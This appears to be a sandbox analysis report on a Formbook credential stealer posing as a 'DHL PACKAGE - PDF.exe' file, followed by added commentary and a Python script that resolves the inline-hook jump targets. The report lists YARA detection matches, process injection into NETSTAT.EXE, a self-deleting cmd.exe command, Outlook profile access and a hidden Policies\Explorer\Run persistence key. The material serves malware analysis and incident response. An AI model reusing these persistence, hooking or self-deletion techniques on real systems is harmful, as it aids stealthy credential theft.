          Source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/22@2/2
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeCode function: 0_2_00404686 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404686
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeCode function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,0_2_00402138
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe | File created: C:\Users\user\AppData\Roaming\for
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_01
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe | File created: C:\Users\user\AppData\Local\Temp\nsxD96B.tmp
          Source: DHL PACKAGE - PDF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe SitulaCystocele,Hurley
          Source: DHL PACKAGE - PDF.exeVirustotal: Detection: 49%
          Source: DHL PACKAGE - PDF.exeReversingLabs: Detection: 33%
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe | File read: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe
          Source: unknownProcess created: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe 'C:\Users\user\Desktop\DHL PACKAGE - PDF.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe SitulaCystocele,Hurley
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe SitulaCystocele,Hurley
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | File written: C:\Users\user\AppData\Roaming\597OP970\597logri.ini
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: DHL PACKAGE - PDF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000009.00000000.312329674.000000000DDE0000.00000002.00000001.sdmp
          Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\vsa7director.pdb source: Vsa7Director.dll.0.dr
          Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000004.00000002.346057255.000000000510F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000014.00000002.506606875.00000000038BF000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: NETSTAT.EXE, 00000014.00000002.504500510.000000000350D000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: cmd.exe, NETSTAT.EXE
          Source: Binary string: Microsoft.XslDebugProxy.pdb source: nsxD96C.tmp.0.dr
          Source: Binary string: PermCalc.pdb source: nsxD96C.tmp.0.dr
          Source: Binary string: ActiveSyncBootstrap.pdb source: ActiveSyncBootstrap.dll.0.dr
          Source: Binary string: cmd.pdb source: NETSTAT.EXE, 00000014.00000002.504500510.000000000350D000.00000004.00000020.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000009.00000000.312329674.000000000DDE0000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_10006B78 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 2_2_10006B78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_10002EED push ecx; ret 2_2_10002F00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_004178F7 pushfd ; iretd 4_2_004178FE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00414D4C pushad ; iretd 4_2_00414D4D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041CDE5 push eax; ret 4_2_0041CE38
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_004085A9 push esi; iretd 4_2_004085AD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041CE32 push eax; ret 4_2_0041CE38
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041CE3B push eax; ret 4_2_0041CEA2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041E6E0 push dword ptr [494A20F8h]; ret 4_2_0041E72B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041CE9C push eax; ret 4_2_0041CEA2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041DFF3 push es; ret 4_2_0041DFFC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00416FF8 pushfd ; ret 4_2_0041709A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00416FA0 pushfd ; ret 4_2_0041709A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0506D0D1 push ecx; ret 4_2_0506D0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_0381D0D1 push ecx; ret 20_2_0381D0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DE78F7 pushfd ; iretd 20_2_00DE78FE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DEDA51 push ss; retf 20_2_00DEDA5A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DECDE5 push eax; ret 20_2_00DECE38
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DD85A9 push esi; iretd 20_2_00DD85AD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DE4D4C pushad ; iretd 20_2_00DE4D4D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DEE6E0 push dword ptr [494A20F8h]; ret 20_2_00DEE72B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DECE9C push eax; ret 20_2_00DECEA2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DECE3B push eax; ret 20_2_00DECEA2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DECE32 push eax; ret 20_2_00DECE38
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DE6FF8 pushfd ; ret 20_2_00DE709A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DE6FA0 pushfd ; ret 20_2_00DE709A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DED741 pushad ; iretd 20_2_00DED6F5
Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe File created: C:\Users\user\AppData\Local\Temp\SitulaCystocele.dll
Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe File created: C:\Users\user\AppData\Local\Temp\mode\Thumbs.db\intern\ActiveSyncBootstrap.dll
Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe File created: C:\Users\user\AppData\Local\Temp\mode\Thumbs.db\intern\MicrosoftVisualStudioUI.dll
Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe File created: C:\Users\user\AppData\Local\Temp\mode\Thumbs.db\intern\PermCalc.exe
Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe File created: C:\Users\user\AppData\Roaming\for\page_1\MicrosoftXslDebugProxy.exe
Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe File created: C:\Users\user\AppData\Local\Temp\mode\Thumbs.db\intern\NatDbgDEUI.dll
Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe File created: C:\Users\user\AppData\Local\Temp\mode\Thumbs.db\intern\Vsa7Director.dll

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 8PO04
Note that the value (8PO04) is written by the injected NETSTAT.EXE process, not by the original sample, and that it sits under Policies\Explorer\Run rather than the commonly inspected CurrentVersion\Run key; a persistence check that only enumerates the HKLM and HKCU ...\CurrentVersion\Run keys will not see it.

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE8
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 7016 base: 774D5050 value: E9 EB 61 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 7016 base: 774D50F0 value: E9 5B 61 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 7016 base: 774D5180 value: E9 9B 60 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 7016 base: 774D5190 value: E9 CB 60 FB FF
Each written value is a 5-byte x86 near JMP (opcode E9 followed by a signed 32-bit displacement), the classic inline-hook patch of a function prolog. The four write addresses lie within 0x140 bytes of each other, so several neighbouring exported functions of one module in the 32-bit rundll32.exe process are being redirected; the report does not name that module.
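The report lists the patched addresses and the JMP bytes but not where the jumps go. The following is an added example (it is not part of the sandbox report and not the malware's or the sandbox's code) that resolves each E9 write to its target address and groups the targets. The four entries are copied from the "Memory written" lines above as constructed input; the PeekMessageA bytes from the explorer.exe entry are included only to show the helper refusing bytes that are not a near JMP. The function names and the clustering window are this example's own choices.

```python
import struct

# Constructed input: the four "Memory written" entries for rundll32.exe
# (PID 7016) from the report, as (base address, bytes written). The report
# does not say which module the 0x774D5xxx addresses belong to.
HOOK_WRITES = [
    (0x774D5050, bytes.fromhex("E9EB61FBFF")),
    (0x774D50F0, bytes.fromhex("E95B61FBFF")),
    (0x774D5180, bytes.fromhex("E99B60FBFF")),
    (0x774D5190, bytes.fromhex("E9CB60FBFF")),
]

# Constructed input: the new PeekMessageA prolog bytes from the explorer.exe
# entry. They are not an E9 jump, so the resolver must not invent a target.
PEEKMESSAGE_NEW_CODE = bytes([0x48, 0x8B, 0xB8, 0x81, 0x1E, 0xE8])


def jmp_target(base, code):
    """Resolve a 32-bit x86 near JMP (opcode E9 + signed rel32) written at
    `base`. The displacement is relative to the end of the 5-byte
    instruction, so target = base + 5 + rel32 (mod 2**32). Returns None
    when the bytes are not an E9 jump rather than guessing."""
    if len(code) < 5 or code[0] != 0xE9:
        return None
    rel32 = struct.unpack_from("<i", code, 1)[0]
    return (base + 5 + rel32) & 0xFFFFFFFF


def resolve_hooks(writes):
    """Return [(patched address, jump target)] for every E9 write."""
    resolved = []
    for base, code in writes:
        target = jmp_target(base, code)
        if target is not None:
            resolved.append((base, target))
    return resolved


def cluster_targets(writes, window=0x1000):
    """Group jump targets that lie within `window` bytes of each other.
    Many patched prologs jumping into one small region is the usual shape of
    a hook engine: a stub/trampoline table allocated by the injected code,
    one stub per hooked API. Returns a list of sorted clusters."""
    targets = sorted(t for _, t in resolve_hooks(writes))
    clusters = []
    for t in targets:
        if clusters and t - clusters[-1][-1] <= window:
            clusters[-1].append(t)
        else:
            clusters.append([t])
    return clusters


def hook_summary(writes, window=0x1000):
    """Per-hook 'patched -> target' lines plus the (low, high) bounds of each
    target cluster, in a dict that can go straight into an IR note."""
    return {
        "hooks": [f"{b:08X} -> {t:08X}" for b, t in resolve_hooks(writes)],
        "trampoline_regions": [(c[0], c[-1]) for c in cluster_targets(writes, window)],
    }


if __name__ == "__main__":
    summary = hook_summary(HOOK_WRITES)
    for line in summary["hooks"]:
        print(line)
    for lo, hi in summary["trampoline_regions"]:
        print(f"trampoline region: {lo:08X}-{hi:08X}")
```

All four jumps resolve into a single 0x40-byte region (0x7748B220 to 0x7748B260), which is what a per-function stub table looks like. On a live host or a memory dump the next step is to look up the rundll32.exe (PID 7016) memory map: the module containing 0x774D5xxx tells you which API family was hooked, and the allocation containing the targets (typically a private, executable region not backed by any image) is where the injected hook code lives and is the region to carve.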